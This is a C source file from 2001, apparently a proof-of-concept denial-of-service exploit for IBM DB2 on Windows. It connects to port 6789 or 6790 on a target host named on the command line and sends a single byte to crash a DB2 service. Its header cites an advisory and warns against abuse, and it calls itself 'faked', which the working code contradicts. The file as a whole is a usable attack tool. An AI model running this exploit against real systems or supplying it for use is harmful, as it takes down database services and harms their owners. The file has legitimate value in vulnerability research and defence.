/* 

----[ honoriak@helisec 21.7.2001

Denial of Service against IBM DB2 for Windows (98/NT/2000) 
Problem: Crash when it is sent 1 byte to port 6789 (db2jds.exe) 
   or 6790 (db2ccs.exe)
Advisory: Thanks to Gilles. 
    http://packetstormsecurity.org/0107-exploits/ibm.db2.dos.txt

Proof of concept. DON'T ABUSE.
Script-kiddies: bad luck, it's faked. Man netcat, this .c is useless. 
Only boredom.

*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdlib.h>
#define PORT 6789 /* or 6790 */   

void usage(char *ar) {
  fprintf(stderr, "DoS against IBM DB2 for Windows (98/NT/2000) by ");
  fprintf(stderr, "honoriak@helisec\n");
  fprintf(stderr, "usage: %s victim\n", ar);
  exit(0);
  }

unsigned long resolv(char *h)
  {
struct in_addr h_prov;
struct hostent *hv;

if (!(hv = gethostbyname(h))) return(0);
memcpy((char *)&h_prov.s_addr, hv->h_addr, hv->h_length);
return(h_prov.s_addr);
}

int main(int argc, char *argv[]) {

struct sockaddr_in vic;
unsigned char boom;
int sck, cn;
boom = 'P';

  if (argc < 2) { 
  usage(argv[0]); 
  }

bzero(&vic, sizeof(vic));
vic.sin_family = AF_INET;
vic.sin_port = htons(PORT);

if ( (inet_pton(AF_INET, argv[1], &vic.sin_addr)) <= 0) {
  vic.sin_addr.s_addr = resolv(argv[1]);
  }
if (!vic.sin_addr.s_addr) {
  fprintf(stderr, "Error resolving host\n");
  exit(-1);
  }
if ( (sck = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  fprintf(stderr, "Error opening socket\n");
  exit(-1);
  }
if ( (cn = connect(sck, (struct sockaddr *)&vic, sizeof(vic))) < 0) {
  fprintf(stderr, "Error connecting...\n");
  exit(-1);
  }

if ( (send(sck, &boom, strlen(&boom), 0)) < 1) {
  fprintf(stderr, "Error sending, IBM DB2 is installed? 6789 is closed. Try 6790.\n");
  exit(-1);
  }
fprintf(stderr, "1 byte sent");
exit(-1);
}

/* helisec 2001 */